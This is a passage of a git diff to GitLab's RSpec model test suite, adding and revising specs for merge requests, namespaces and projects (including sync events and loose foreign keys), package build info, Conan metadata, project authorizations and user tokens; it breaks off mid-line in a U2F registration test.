a/spec/models/merge_request_spec.rb b/spec/models/merge_request_spec.rb index 5618fb06157..e1db1b3cf3e 100644 --- a/spec/models/merge_request_spec.rb +++ b/spec/models/merge_request_spec.rb @@ -178,6 +178,13 @@ RSpec.describe MergeRequest, factory_default: :keep do it 'returns the merge request title' do expect(subject.default_squash_commit_message).to eq(subject.title) end + + it 'uses template from target project' do + subject.target_project.squash_commit_template = 'Squashed branch %{source_branch} into %{target_branch}' + + expect(subject.default_squash_commit_message) + .to eq('Squashed branch master into feature') + end end describe 'modules' do @@ -1132,7 +1139,7 @@ RSpec.describe MergeRequest, factory_default: :keep do end it 'returns the correct overflow count' do - allow(Commit).to receive(:max_diff_options).and_return(max_files: 2) + allow(Commit).to receive(:diff_max_files).and_return(2) set_compare(merge_request) expect(merge_request.diff_size).to eq('2+') @@ -1641,6 +1648,9 @@ RSpec.describe MergeRequest, factory_default: :keep do it 'uses template from target project' do request = build(:merge_request, title: 'Fix everything') + request.compare_commits = [ + double(safe_message: 'Commit message', gitaly_commit?: true, merge_commit?: false, description?: false) + ] subject.target_project.merge_commit_template = '%{title}' expect(request.default_merge_commit_message) @@ -3953,7 +3963,7 @@ RSpec.describe MergeRequest, factory_default: :keep do create_build(source_pipeline, 60.2, 'test:1') create_build(target_pipeline, 50, 'test:2') - expect(merge_request.pipeline_coverage_delta).to eq('10.20') + expect(merge_request.pipeline_coverage_delta).to be_within(0.001).of(10.2) end end @@ -5032,4 +5042,8 @@ RSpec.describe MergeRequest, factory_default: :keep do expect(described_class.from_fork).to eq([fork_mr]) end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :merge_request } + end end diff --git a/spec/models/namespace/traversal_hierarchy_spec.rb b/spec/models/namespace/traversal_hierarchy_spec.rb index d7b0ee888c0..51932ab943c 100644 --- a/spec/models/namespace/traversal_hierarchy_spec.rb +++ b/spec/models/namespace/traversal_hierarchy_spec.rb @@ -21,7 +21,7 @@ RSpec.describe Namespace::TraversalHierarchy, type: :model do end context 'with group outside of hierarchy' do - let(:group) { create(:namespace) } + let(:group) { create(:group) } it { expect(hierarchy.root).not_to eq root } end diff --git a/spec/models/namespace_spec.rb b/spec/models/namespace_spec.rb index 8f5860c799c..54327fc70d9 100644 --- a/spec/models/namespace_spec.rb +++ b/spec/models/namespace_spec.rb @@ -107,34 +107,6 @@ RSpec.describe Namespace do end end end - - context 'when the feature flag `validate_namespace_parent_type` is disabled' do - before do - stub_feature_flags(validate_namespace_parent_type: false) - end - - context 'when the namespace has no parent' do - it 'allows a namespace to have no parent associated with it' do - namespace = build(:namespace) - - expect(namespace).to be_valid - end - end - - context 'when the namespace has a parent' do - it 'allows a namespace to have a group as its parent' do - namespace = build(:namespace, parent: build(:group)) - - expect(namespace).to be_valid - end - - it 'allows a namespace to have another namespace as its parent' do - namespace = build(:namespace, parent: build(:namespace)) - - expect(namespace).to be_valid - end - end - end end describe '#nesting_level_allowed' do @@ -287,13 +259,12 @@ RSpec.describe Namespace do end end - context 'creating a Namespace with nil type' do + context 'unable to create a Namespace with nil type' do + let(:namespace) { nil } let(:namespace_type) { nil } - it 'is the correct type of namespace' do - expect(Namespace.find(namespace.id)).to be_a(Namespace) - expect(namespace.kind).to eq('user') - expect(namespace.user_namespace?).to be_truthy + it 'raises ActiveRecord::NotNullViolation' do + expect { create(:namespace, type: namespace_type, parent: parent) }.to raise_error(ActiveRecord::NotNullViolation) end end @@ -700,20 +671,6 @@ RSpec.describe Namespace do end end - describe '#ancestors_upto' do - let(:parent) { create(:group) } - let(:child) { create(:group, parent: parent) } - let(:child2) { create(:group, parent: child) } - - it 'returns all ancestors when no namespace is given' do - expect(child2.ancestors_upto).to contain_exactly(child, parent) - end - - it 'includes ancestors upto but excluding the given ancestor' do - expect(child2.ancestors_upto(parent)).to contain_exactly(child) - end - end - describe '#move_dir', :request_store do shared_examples "namespace restrictions" do context "when any project has container images" do @@ -1274,6 +1231,38 @@ RSpec.describe Namespace do end end + describe '#use_traversal_ids_for_ancestors_upto?' do + let_it_be(:namespace, reload: true) { create(:namespace) } + + subject { namespace.use_traversal_ids_for_ancestors_upto? } + + context 'when use_traversal_ids_for_ancestors_upto feature flag is true' do + before do + stub_feature_flags(use_traversal_ids_for_ancestors_upto: true) + end + + it { is_expected.to eq true } + + it_behaves_like 'disabled feature flag when traversal_ids is blank' + end + + context 'when use_traversal_ids_for_ancestors_upto feature flag is false' do + before do + stub_feature_flags(use_traversal_ids_for_ancestors_upto: false) + end + + it { is_expected.to eq false } + end + + context 'when use_traversal_ids? feature flag is false' do + before do + stub_feature_flags(use_traversal_ids: false) + end + + it { is_expected.to eq false } + end + end + describe '#users_with_descendants' do let(:user_a) { create(:user) } let(:user_b) { create(:user) } @@ -2066,4 +2055,79 @@ RSpec.describe Namespace do it { is_expected.to be(true) } end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :group } + end + + context 'Namespaces::SyncEvent' do + let!(:namespace) { create(:group) } + + let_it_be(:new_namespace1) { create(:group) } + let_it_be(:new_namespace2) { create(:group) } + + context 'when creating the namespace' do + it 'creates a namespaces_sync_event record' do + expect(namespace.sync_events.count).to eq(1) + end + + it 'enqueues ProcessSyncEventsWorker' do + expect(Namespaces::ProcessSyncEventsWorker).to receive(:perform_async) + + create(:namespace) + end + end + + context 'when updating namespace parent_id' do + it 'creates a namespaces_sync_event record' do + expect do + namespace.update!(parent_id: new_namespace1.id) + end.to change(Namespaces::SyncEvent, :count).by(1) + + expect(namespace.sync_events.count).to eq(2) + end + + it 'enqueues ProcessSyncEventsWorker' do + expect(Namespaces::ProcessSyncEventsWorker).to receive(:perform_async) + + namespace.update!(parent_id: new_namespace1.id) + end + end + + context 'when updating namespace other attribute' do + it 'creates a namespaces_sync_event record' do + expect do + namespace.update!(name: 'hello') + end.not_to change(Namespaces::SyncEvent, :count) + end + end + + context 'in the same transaction' do + context 'when updating different parent_id' do + it 'creates two namespaces_sync_event records' do + expect do + Namespace.transaction do + namespace.update!(parent_id: new_namespace1.id) + namespace.update!(parent_id: new_namespace2.id) + end + end.to change(Namespaces::SyncEvent, :count).by(2) + + expect(namespace.sync_events.count).to eq(3) + end + end + + context 'when updating the same parent_id' do + it 'creates one namespaces_sync_event record' do + expect do + Namespace.transaction do + namespace.update!(parent_id: new_namespace1.id) + namespace.update!(parent_id: new_namespace1.id) + end + end.to change(Namespaces::SyncEvent, :count).by(1) + + expect(namespace.sync_events.count).to eq(2) + end + end + end + end end diff --git a/spec/models/packages/build_info_spec.rb b/spec/models/packages/build_info_spec.rb index a4369c56fe2..db8ac605d72 100644 --- a/spec/models/packages/build_info_spec.rb +++ b/spec/models/packages/build_info_spec.rb @@ -6,4 +6,46 @@ RSpec.describe Packages::BuildInfo, type: :model do it { is_expected.to belong_to(:package) } it { is_expected.to belong_to(:pipeline) } end + + context 'with some build infos' do + let_it_be(:package) { create(:package) } + let_it_be(:build_infos) { create_list(:package_build_info, 3, :with_pipeline, package: package) } + let_it_be(:build_info_with_no_pipeline) { create(:package_build_info) } + + describe '.pluck_pipeline_ids' do + subject { package.build_infos.pluck_pipeline_ids.sort } + + it { is_expected.to eq(build_infos.map(&:pipeline_id).sort) } + end + + describe '.without_empty_pipelines' do + subject { package.build_infos.without_empty_pipelines } + + it { is_expected.to contain_exactly(*build_infos) } + end + + describe '.order_by_pipeline_id asc' do + subject { package.build_infos.order_by_pipeline_id(:asc) } + + it { is_expected.to eq(build_infos) } + end + + describe '.order_by_pipeline_id desc' do + subject { package.build_infos.order_by_pipeline_id(:desc) } + + it { is_expected.to eq(build_infos.reverse) } + end + + describe '.with_pipeline_id_less_than' do + subject { package.build_infos.with_pipeline_id_less_than(build_infos[1].pipeline_id) } + + it { is_expected.to contain_exactly(build_infos[0]) } + end + + describe '.with_pipeline_id_greater_than' do + subject { package.build_infos.with_pipeline_id_greater_than(build_infos[1].pipeline_id) } + + it { is_expected.to contain_exactly(build_infos[2]) } + end + end end diff --git a/spec/models/packages/conan/metadatum_spec.rb b/spec/models/packages/conan/metadatum_spec.rb index 112f395818b..d00723e8e43 100644 --- a/spec/models/packages/conan/metadatum_spec.rb +++ b/spec/models/packages/conan/metadatum_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe Packages::Conan::Metadatum, type: :model do + using RSpec::Parameterized::TableSyntax + describe 'relationships' do it { is_expected.to belong_to(:package) } end @@ -45,6 +47,30 @@ RSpec.describe Packages::Conan::Metadatum, type: :model do it { is_expected.not_to allow_value("my@channel").for(:package_channel) } end + describe '#username_channel_none_values' do + let_it_be(:package) { create(:conan_package) } + + let(:metadatum) { package.conan_metadatum } + + subject { metadatum.valid? } + + where(:username, :channel, :valid) do + 'username' | 'channel' | true + 'username' | '_' | false + '_' | 'channel' | false + '_' | '_' | true + end + + with_them do + before do + metadatum.package_username = username + metadatum.package_channel = channel + end + + it { is_expected.to eq(valid) } + end + end + describe '#conan_package_type' do it 'will not allow a package with a different package_type' do package = build('package') @@ -87,4 +113,27 @@ RSpec.describe Packages::Conan::Metadatum, type: :model do expect(described_class.full_path_from(package_username: username)).to eq('foo/bar/baz-buz') end end + + describe '.validate_username_and_channel' do + where(:username, :channel, :error_field) do + 'username' | 'channel' | nil + 'username' | '_' | :channel + '_' | 'channel' | :username + '_' | '_' | nil + end + + with_them do + if params[:error_field] + it 'yields the block when there is an error' do + described_class.validate_username_and_channel(username, channel) do |none_field| + expect(none_field).to eq(error_field) + end + end + else + it 'does not yield the block when there is no error' do + expect { |b| described_class.validate_username_and_channel(username, channel, &b) }.not_to yield_control + end + end + end + end end diff --git a/spec/models/postgresql/replication_slot_spec.rb b/spec/models/postgresql/replication_slot_spec.rb index c3b67a2e7b8..63a19541ab5 100644 --- a/spec/models/postgresql/replication_slot_spec.rb +++ b/spec/models/postgresql/replication_slot_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe Postgresql::ReplicationSlot do + it { is_expected.to be_a Gitlab::Database::SharedModel } + describe '.in_use?' do it 'returns true when replication slots are present' do expect(described_class).to receive(:exists?).and_return(true) @@ -73,28 +75,22 @@ RSpec.describe Postgresql::ReplicationSlot do before(:all) do skip('max_replication_slots too small') if skip_examples - @current_slot_count = ApplicationRecord + @current_slot_count = described_class .connection - .execute("SELECT COUNT(*) FROM pg_replication_slots;") - .first - .fetch('count') - .to_i + .select_value("SELECT COUNT(*) FROM pg_replication_slots") - @current_unused_count = ApplicationRecord + @current_unused_count = described_class .connection - .execute("SELECT COUNT(*) FROM pg_replication_slots WHERE active = 'f';") - .first - .fetch('count') - .to_i + .select_value("SELECT COUNT(*) FROM pg_replication_slots WHERE active = 'f';") - ApplicationRecord + described_class .connection .execute("SELECT * FROM pg_create_physical_replication_slot('test_slot');") end after(:all) do unless skip_examples - ApplicationRecord + described_class .connection .execute("SELECT pg_drop_replication_slot('test_slot');") end diff --git a/spec/models/preloaders/group_root_ancestor_preloader_spec.rb b/spec/models/preloaders/group_root_ancestor_preloader_spec.rb deleted file mode 100644 index 0d622e84ef1..00000000000 --- a/spec/models/preloaders/group_root_ancestor_preloader_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Preloaders::GroupRootAncestorPreloader do - let_it_be(:user) { create(:user) } - let_it_be(:root_parent1) { create(:group, :private, name: 'root-1', path: 'root-1') } - let_it_be(:root_parent2) { create(:group, :private, name: 'root-2', path: 'root-2') } - let_it_be(:guest_group) { create(:group, name: 'public guest', path: 'public-guest') } - let_it_be(:private_maintainer_group) { create(:group, :private, name: 'b private maintainer', path: 'b-private-maintainer', parent: root_parent1) } - let_it_be(:private_developer_group) { create(:group, :private, project_creation_level: nil, name: 'c public developer', path: 'c-public-developer') } - let_it_be(:public_maintainer_group) { create(:group, :private, name: 'a public maintainer', path: 'a-public-maintainer', parent: root_parent2) } - - let(:root_query_regex) { /\ASELECT.+FROM "namespaces" WHERE "namespaces"."id" = \d+/ } - let(:additional_preloads) { [] } - let(:groups) { [guest_group, private_maintainer_group, private_developer_group, public_maintainer_group] } - let(:pristine_groups) { Group.where(id: groups) } - - shared_examples 'executes N matching DB queries' do |expected_query_count, query_method = nil| - it 'executes the specified root_ancestor queries' do - expect do - pristine_groups.each do |group| - root_ancestor = group.root_ancestor - - root_ancestor.public_send(query_method) if query_method.present? - end - end.to make_queries_matching(root_query_regex, expected_query_count) - end - - it 'strong_memoizes the correct root_ancestor' do - pristine_groups.each do |group| - expected_parent_id = group.root_ancestor.id == group.id ? nil : group.root_ancestor.id - - expect(group.parent_id).to eq(expected_parent_id) - end - end - end - - context 'when the preloader is used' do - before do - preload_ancestors - end - - context 'when no additional preloads are provided' do - it_behaves_like 'executes N matching DB queries', 0 - end - - context 'when additional preloads are provided' do - let(:additional_preloads) { [:route] } - let(:root_query_regex) { /\ASELECT.+FROM "routes" WHERE "routes"."source_id" = \d+/ } - - it_behaves_like 'executes N matching DB queries', 0, :full_path - end - end - - context 'when the preloader is not used' do - it_behaves_like 'executes N matching DB queries', 2 - end - - def preload_ancestors - described_class.new(pristine_groups, additional_preloads).execute - end -end diff --git a/spec/models/project_authorization_spec.rb b/spec/models/project_authorization_spec.rb index 58c0ff48b46..37da30fb54c 100644 --- a/spec/models/project_authorization_spec.rb +++ b/spec/models/project_authorization_spec.rb @@ -3,40 +3,59 @@ require 'spec_helper' RSpec.describe ProjectAuthorization do - let_it_be(:user) { create(:user) } - let_it_be(:project1) { create(:project) } - let_it_be(:project2) { create(:project) } - let_it_be(:project3) { create(:project) } + describe 'relations' do + it { is_expected.to belong_to(:user) } + it { is_expected.to belong_to(:project) } + end - describe '.insert_authorizations' do - it 'inserts the authorizations' do - described_class - .insert_authorizations([[user.id, project1.id, Gitlab::Access::MAINTAINER]]) + describe 'validations' do + it { is_expected.to validate_presence_of(:project) } + it { is_expected.to validate_presence_of(:user) } + it { is_expected.to validate_presence_of(:access_level) } + it { is_expected.to validate_inclusion_of(:access_level).in_array(Gitlab::Access.all_values) } + end - expect(user.project_authorizations.count).to eq(1) - end + describe '.insert_all' do + let_it_be(:user) { create(:user) } + let_it_be(:project_1) { create(:project) } + let_it_be(:project_2) { create(:project) } + let_it_be(:project_3) { create(:project) } - it 'inserts rows in batches' do - described_class.insert_authorizations([ - [user.id, project1.id, Gitlab::Access::MAINTAINER], - [user.id, project2.id, Gitlab::Access::MAINTAINER] - ], 1) + it 'skips duplicates and inserts the remaining rows without error' do + create(:project_authorization, user: user, project: project_1, access_level: Gitlab::Access::MAINTAINER) + + attributes = [ + { user_id: user.id, project_id: project_1.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_2.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_3.id, access_level: Gitlab::Access::MAINTAINER } + ] - expect(user.project_authorizations.count).to eq(2) + described_class.insert_all(attributes) + + expect(user.project_authorizations.pluck(:user_id, :project_id, :access_level)).to match_array(attributes.map(&:values)) end + end - it 'skips duplicates and inserts the remaining rows without error' do - create(:project_authorization, user: user, project: project1, access_level: Gitlab::Access::MAINTAINER) + describe '.insert_all_in_batches' do + let_it_be(:user) { create(:user) } + let_it_be(:project_1) { create(:project) } + let_it_be(:project_2) { create(:project) } + let_it_be(:project_3) { create(:project) } - rows = [ - [user.id, project1.id, Gitlab::Access::MAINTAINER], - [user.id, project2.id, Gitlab::Access::MAINTAINER], - [user.id, project3.id, Gitlab::Access::MAINTAINER] + let(:per_batch_size) { 2 } + + it 'inserts the rows in batches, as per the `per_batch` size' do + attributes = [ + { user_id: user.id, project_id: project_1.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_2.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_3.id, access_level: Gitlab::Access::MAINTAINER } ] - described_class.insert_authorizations(rows) + expect(described_class).to receive(:insert_all).twice.and_call_original + + described_class.insert_all_in_batches(attributes, per_batch_size) - expect(user.project_authorizations.pluck(:user_id, :project_id, :access_level)).to match_array(rows) + expect(user.project_authorizations.pluck(:user_id, :project_id, :access_level)).to match_array(attributes.map(&:values)) end end end diff --git a/spec/models/project_spec.rb b/spec/models/project_spec.rb index 3a8768ff463..4e38bf7d3e3 100644 --- a/spec/models/project_spec.rb +++ b/spec/models/project_spec.rb @@ -261,7 +261,49 @@ RSpec.describe Project, factory_default: :keep do end context 'updating a project' do - context 'with project namespaces' do + shared_examples 'project update' do + let_it_be(:project_namespace) { create(:project_namespace) } + let_it_be(:project) { project_namespace.project } + + context 'when project namespace is not set' do + before do + project.update_column(:project_namespace_id, nil) + project.reload + end + + it 'updates the project successfully' do + # pre-check that project does not have a project namespace + expect(project.project_namespace).to be_nil + + project.update!(path: 'hopefully-valid-path2') + + expect(project).to be_persisted + expect(project).to be_valid + expect(project.path).to eq('hopefully-valid-path2') + expect(project.project_namespace).to be_nil + end + end + + context 'when project has an associated project namespace' do + # when FF is disabled creating a project does not create a project_namespace, so we create one + it 'project is INVALID when trying to remove project namespace' do + project.reload + # check that project actually has an associated project namespace + expect(project.project_namespace_id).to eq(project_namespace.id) + + expect do + project.update!(project_namespace_id: nil, path: 'hopefully-valid-path1') + end.to raise_error(ActiveRecord::RecordInvalid) + expect(project).to be_invalid + expect(project.errors.full_messages).to include("Project namespace can't be blank") + expect(project.reload.project_namespace).to be_in_sync_with_project(project) + end + end + end + + context 'with create_project_namespace_on_project_create FF enabled' do + it_behaves_like 'project update' + it 'keeps project namespace in sync with project' do project = create(:project) project.update!(path: 'hopefully-valid-path1') @@ -270,19 +312,21 @@ RSpec.describe Project, factory_default: :keep do expect(project.project_namespace).to be_persisted expect(project.project_namespace).to be_in_sync_with_project(project) end + end - context 'with FF disabled' do - before do - stub_feature_flags(create_project_namespace_on_project_create: false) - end + context 'with create_project_namespace_on_project_create FF disabled' do + before do + stub_feature_flags(create_project_namespace_on_project_create: false) + end - it 'does not create a project namespace when project is updated' do - project = create(:project) - project.update!(path: 'hopefully-valid-path1') + it_behaves_like 'project update' - expect(project).to be_persisted - expect(project.project_namespace).to be_nil - end + it 'does not create a project namespace when project is updated' do + project = create(:project) + project.update!(path: 'hopefully-valid-path1') + + expect(project).to be_persisted + expect(project.project_namespace).to be_nil end end end @@ -807,6 +851,23 @@ RSpec.describe Project, factory_default: :keep do end end + describe '#remove_project_authorizations' do + let_it_be(:project) { create(:project) } + let_it_be(:user_1) { create(:user) } + let_it_be(:user_2) { create(:user) } + let_it_be(:user_3) { create(:user) } + + it 'removes the project authorizations of the specified users in the current project' do + create(:project_authorization, user: user_1, project: project) + create(:project_authorization, user: user_2, project: project) + create(:project_authorization, user: user_3, project: project) + + project.remove_project_authorizations([user_1.id, user_2.id]) + + expect(project.project_authorizations.pluck(:user_id)).not_to include(user_1.id, user_2.id) + end + end + describe 'reference methods' do let_it_be(:owner) { create(:user, name: 'Gitlab') } let_it_be(:namespace) { create(:namespace, name: 'Sample namespace', path: 'sample-namespace', owner: owner) } @@ -3520,6 +3581,29 @@ RSpec.describe Project, factory_default: :keep do expect(project.forks).to contain_exactly(forked_project) end end + + describe '#lfs_object_oids_from_fork_source' do + let_it_be(:lfs_object) { create(:lfs_object) } + let_it_be(:another_lfs_object) { create(:lfs_object) } + + let(:oids) { [lfs_object.oid, another_lfs_object.oid] } + + context 'when fork has one of two LFS objects' do + before do + create(:lfs_objects_project, lfs_object: lfs_object, project: project) + create(:lfs_objects_project, lfs_object: another_lfs_object, project: forked_project) + end + + it 'returns OIDs of owned LFS objects', :aggregate_failures do + expect(forked_project.lfs_objects_oids_from_fork_source(oids: oids)).to eq([lfs_object.oid]) + expect(forked_project.lfs_objects_oids(oids: oids)).to eq([another_lfs_object.oid]) + end + + it 'returns empty when project is not a fork' do + expect(project.lfs_objects_oids_from_fork_source(oids: oids)).to eq([]) + end + end + end end it_behaves_like 'can housekeep repository' do @@ -7392,6 +7476,83 @@ RSpec.describe Project, factory_default: :keep do end end + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :project } + end + + context 'Projects::SyncEvent' do + let!(:project) { create(:project) } + + let_it_be(:new_namespace1) { create(:namespace) } + let_it_be(:new_namespace2) { create(:namespace) } + + context 'when creating the project' do + it 'creates a projects_sync_event record' do + expect(project.sync_events.count).to eq(1) + end + + it 'enqueues ProcessProjectSyncEventsWorker' do + expect(Projects::ProcessSyncEventsWorker).to receive(:perform_async) + + create(:project) + end + end + + context 'when updating project namespace_id' do + it 'creates a projects_sync_event record' do + expect do + project.update!(namespace_id: new_namespace1.id) + end.to change(Projects::SyncEvent, :count).by(1) + + expect(project.sync_events.count).to eq(2) + end + + it 'enqueues ProcessProjectSyncEventsWorker' do + expect(Projects::ProcessSyncEventsWorker).to receive(:perform_async) + + project.update!(namespace_id: new_namespace1.id) + end + end + + context 'when updating project other attribute' do + it 'creates a projects_sync_event record' do + expect do + project.update!(name: 'hello') + end.not_to change(Projects::SyncEvent, :count) + end + end + + context 'in the same transaction' do + context 'when updating different namespace_id' do + it 'creates two projects_sync_event records' do + expect do + Project.transaction do + project.update!(namespace_id: new_namespace1.id) + project.update!(namespace_id: new_namespace2.id) + end + end.to change(Projects::SyncEvent, :count).by(2) + + expect(project.sync_events.count).to eq(3) + end + end + + context 'when updating the same namespace_id' do + it 'creates one projects_sync_event record' do + expect do + Project.transaction do + project.update!(namespace_id: new_namespace1.id) + project.update!(namespace_id: new_namespace1.id) + end + end.to change(Projects::SyncEvent, :count).by(1) + + expect(project.sync_events.count).to eq(2) + end + end + end + end + + private + def finish_job(export_job) export_job.start export_job.finish diff --git a/spec/models/project_team_spec.rb b/spec/models/project_team_spec.rb index a6a56180ce1..c0bad96effc 100644 --- a/spec/models/project_team_spec.rb +++ b/spec/models/project_team_spec.rb @@ -237,7 +237,6 @@ RSpec.describe ProjectTeam do context 'when `tasks_to_be_done` and `tasks_project_id` are passed' do before do - stub_experiments(invite_members_for_task: true) project.team.add_users([user1], :developer, tasks_to_be_done: %w(ci code), tasks_project_id: project.id) end diff --git a/spec/models/repository_spec.rb b/spec/models/repository_spec.rb index d50c60774b4..96cbdb468aa 100644 --- a/spec/models/repository_spec.rb +++ b/spec/models/repository_spec.rb @@ -1679,6 +1679,16 @@ RSpec.describe Repository do expect(blobs.first.name).to eq('foobar') expect(blobs.size).to eq(1) end + + context 'when Gitaly returns NoRepository' do + before do + allow(repository.raw_repository).to receive(:batch_blobs).and_raise(Gitlab::Git::Repository::NoRepository) + end + + it 'returns empty array' do + expect(repository.blobs_at([%w[master foobar]])).to match_array([]) + end + end end describe '#root_ref' do diff --git a/spec/models/snippet_spec.rb b/spec/models/snippet_spec.rb index e24dd910c39..5d4a78bb15f 100644 --- a/spec/models/snippet_spec.rb +++ b/spec/models/snippet_spec.rb @@ -403,6 +403,51 @@ RSpec.describe Snippet do end end + describe '.find_by_project_title_trunc_created_at' do + let_it_be(:snippet) { create(:snippet) } + let_it_be(:created_at_without_ms) { snippet.created_at.change(usec: 0) } + + it 'returns a record if arguments match' do + result = described_class.find_by_project_title_trunc_created_at( + snippet.project, + snippet.title, + created_at_without_ms + ) + + expect(result).to eq(snippet) + end + + it 'returns nil if project does not match' do + result = described_class.find_by_project_title_trunc_created_at( + 'unmatched project', + snippet.title, + created_at_without_ms # to_s truncates ms of the argument + ) + + expect(result).to be(nil) + end + + it 'returns nil if title does not match' do + result = described_class.find_by_project_title_trunc_created_at( + snippet.project, + 'unmatched title', + created_at_without_ms # to_s truncates ms of the argument + ) + + expect(result).to be(nil) + end + + it 'returns nil if created_at does not match' do + result = described_class.find_by_project_title_trunc_created_at( + snippet.project, + snippet.title, + snippet.created_at # fails match by milliseconds + ) + + expect(result).to be(nil) + end + end + describe '#participants' do let_it_be(:project) { create(:project, :public) } let_it_be(:snippet) { create(:snippet, content: 'foo', project: project) } diff --git a/spec/models/terraform/state_version_spec.rb b/spec/models/terraform/state_version_spec.rb index ac2e8d167b3..7af9b7897ff 100644 --- a/spec/models/terraform/state_version_spec.rb +++ b/spec/models/terraform/state_version_spec.rb @@ -92,4 +92,9 @@ RSpec.describe Terraform::StateVersion do end end end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:model) { create(:terraform_state_version) } + let!(:parent) { model.build } + end end diff --git a/spec/models/timelog_spec.rb b/spec/models/timelog_spec.rb index d6c31307e30..f96d02e6a82 100644 --- a/spec/models/timelog_spec.rb +++ b/spec/models/timelog_spec.rb @@ -21,7 +21,7 @@ RSpec.describe Timelog do it { expect(subject.project_id).not_to be_nil } - describe 'Issuable validation' do + describe 'validation' do it 'is invalid if issue_id and merge_request_id are missing' do subject.attributes = { issue: nil, merge_request: nil } @@ -139,4 +139,14 @@ RSpec.describe Timelog do time + 1.day end end + + describe 'hooks' do + describe '.set_project' do + it 'populates project with issuable project' do + timelog = create(:issue_timelog, issue: issue) + + expect(timelog.project_id).to be(timelog.issue.project_id) + end + end + end end diff --git a/spec/models/u2f_registration_spec.rb b/spec/models/u2f_registration_spec.rb index 7a70cf69566..6bb9ccfcf35 100644 --- a/spec/models/u2f_registration_spec.rb +++ b/spec/models/u2f_registration_spec.rb @@ -20,9 +20,9 @@ RSpec.describe U2fRegistration do describe '#create_webauthn_registration' do shared_examples_for 'creates webauthn registration' do it 'creates webauthn registration' do - u2f_registration.save! + created_record = u2f_registration - webauthn_registration = WebauthnRegistration.where(u2f_registration_id: u2f_registration.id) + webauthn_registration = WebauthnRegistration.where(u2f_registration_id: created_record.id) expect(webauthn_registration).to exist end end @@ -43,13 +43,16 @@ RSpec.describe U2fRegistration do it 'logs error' do allow(Gitlab::Auth::U2fWebauthnConverter).to receive(:new).and_raise('boom!') - expect(Gitlab::AppJsonLogger).to( - receive(:error).with(a_hash_including(event: 'u2f_migration', - error: 'RuntimeError', - message: 'U2F to WebAuthn conversion failed')) - ) - u2f_registration.save! + allow_next_instance_of(U2fRegistration) do |u2f_registration| + allow(u2f_registration).to receive(:id).and_return(123) + end + + expect(Gitlab::ErrorTracking).to( + receive(:track_exception).with(kind_of(StandardError), + u2f_registration_id: 123)) + + u2f_registration end end end diff --git a/spec/models/user_spec.rb b/spec/models/user_spec.rb index b5d4614d206..f8cea619233 100644 --- a/spec/models/user_spec.rb +++ b/spec/models/user_spec.rb @@ -110,8 +110,8 @@ RSpec.describe User do it { is_expected.to have_many(:spam_logs).dependent(:destroy) } it { is_expected.to have_many(:todos) } it { is_expected.to have_many(:award_emoji).dependent(:destroy) } - it { is_expected.to have_many(:builds).dependent(:nullify) } - it { is_expected.to have_many(:pipelines).dependent(:nullify) } + it { is_expected.to have_many(:builds) } + it { is_expected.to have_many(:pipelines) } it { is_expected.to have_many(:chat_names).dependent(:destroy) } it { is_expected.to have_many(:uploads) } it { is_expected.to have_many(:reported_abuse_reports).dependent(:destroy).class_name('AbuseReport') } @@ -124,7 +124,7 @@ RSpec.describe User do it { is_expected.to have_many(:created_custom_emoji).inverse_of(:creator) } it { is_expected.to have_many(:in_product_marketing_emails) } it { is_expected.to have_many(:timelogs) } - it { is_expected.to have_many(:callouts).class_name('UserCallout') } + it { is_expected.to have_many(:callouts).class_name('Users::Callout') } it { is_expected.to have_many(:group_callouts).class_name('Users::GroupCallout') } describe '#user_detail' do @@ -1080,6 +1080,16 @@ RSpec.describe User do end end + context 'strip attributes' do + context 'name' do + let(:user) { User.new(name: ' John Smith ') } + + it 'strips whitespaces on validation' do + expect { user.valid? }.to change { user.name }.to('John Smith') + end + end + end + describe 'Respond to' do it { is_expected.to respond_to(:admin?) } it { is_expected.to respond_to(:name) } @@ -1540,7 +1550,11 @@ RSpec.describe User do allow(user).to receive(:update_highest_role) end - expect(SecureRandom).to receive(:hex).and_return('3b8ca303') + allow_next_instance_of(Namespaces::UserNamespace) do |namespace| + allow(namespace).to receive(:schedule_sync_event_worker) + end + + expect(SecureRandom).to receive(:hex).with(no_args).and_return('3b8ca303') user = create(:user) @@ -1612,6 +1626,46 @@ RSpec.describe User do end end + describe 'enabled_static_object_token' do + let_it_be(:static_object_token) { 'ilqx6jm1u945macft4eff0nw' } + + it 'returns incoming email token when supported' do + allow(Gitlab::CurrentSettings).to receive(:static_objects_external_storage_enabled?).and_return(true) + + user = create(:user, static_object_token: static_object_token) + + expect(user.enabled_static_object_token).to eq(static_object_token) + end + + it 'returns `nil` when not supported' do + allow(Gitlab::CurrentSettings).to receive(:static_objects_external_storage_enabled?).and_return(false) + + user = create(:user, static_object_token: static_object_token) + + expect(user.enabled_static_object_token).to be_nil + end + end + + describe 'enabled_incoming_email_token' do + let_it_be(:incoming_email_token) { 'ilqx6jm1u945macft4eff0nw' } + + it 'returns incoming email token when supported' do + allow(Gitlab::IncomingEmail).to receive(:supports_issue_creation?).and_return(true) + + user = create(:user, incoming_email_token: incoming_email_token) + + expect(user.enabled_incoming_email_token).to eq(incoming_email_token) + end + + it 'returns `nil` when not supported' do + allow(Gitlab::IncomingEmail).to receive(:supports_issue_creation?).and_return(false) + + user = create(:user, incoming_email_token: incoming_email_token) + + expect(user.enabled_incoming_email_token).to be_nil + end + end + describe '#recently_sent_password_reset?' do it 'is false when reset_password_sent_at is nil' do user = build_stubbed(:user, reset_password_sent_at: nil) @@ -1726,6 +1780,52 @@ RSpec.describe User do end end + context 'two_factor_u2f_enabled?' do + let_it_be(:user) { create(:user, :two_factor) } + + context 'when webauthn feature flag is enabled' do + context 'user has no U2F registration' do + it { expect(user.two_factor_u2f_enabled?).to eq(false) } + end + + context 'user has existing U2F registration' do + it 'returns false' do + device = U2F::FakeU2F.new(FFaker::BaconIpsum.characters(5)) + create(:u2f_registration, name: 'my u2f device', + user: user, + certificate: Base64.strict_encode64(device.cert_raw), + key_handle: 